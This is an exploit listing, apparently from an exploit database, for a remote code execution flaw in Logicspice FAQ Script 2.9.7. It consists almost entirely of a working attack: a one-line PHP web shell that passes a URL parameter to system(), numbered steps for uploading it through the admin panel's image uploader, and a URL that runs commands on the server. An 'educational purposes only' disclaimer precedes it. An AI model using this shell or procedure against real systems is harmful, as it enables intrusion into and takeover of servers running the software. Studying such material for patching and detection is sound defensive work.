Exploits / Vulnerability Discovered : 2018-09-04 |
Type : webapps |
Platform : php
This exploit / vulnerability Logicspice faq script 2.9.7 remote code execution is for educational purposes only and if it is used you will do on your own risk!
# Description : Logicspice FAQ Script 2.9.7 allows to upload arbitrary files which
# leads to a remote command execution on the remote server.
# 1) Create a file with the below PHP code and save it as .php
<?php $cmd=$_GET['cmd']; system($cmd); ?>
# 2) Login to FAQ Script admin portal as priviliage user
# 3) At the left hand side go to Manage FAQ --> List FAQ (http://domain/admin/faqs)
# 4) Click at the Actions button of a current FAQ product --> Edit
# 5) Click (Image) button on Content panel.
# 6) Chose Upload section and browse your .php file.
# 7) Finaly click "Send it to Server". Script will give you a link belong to
# our php file.
# 8) verift the exploit:
# http://domain/webroot/files/uploadimages/e90a3_shell.php?cmd=id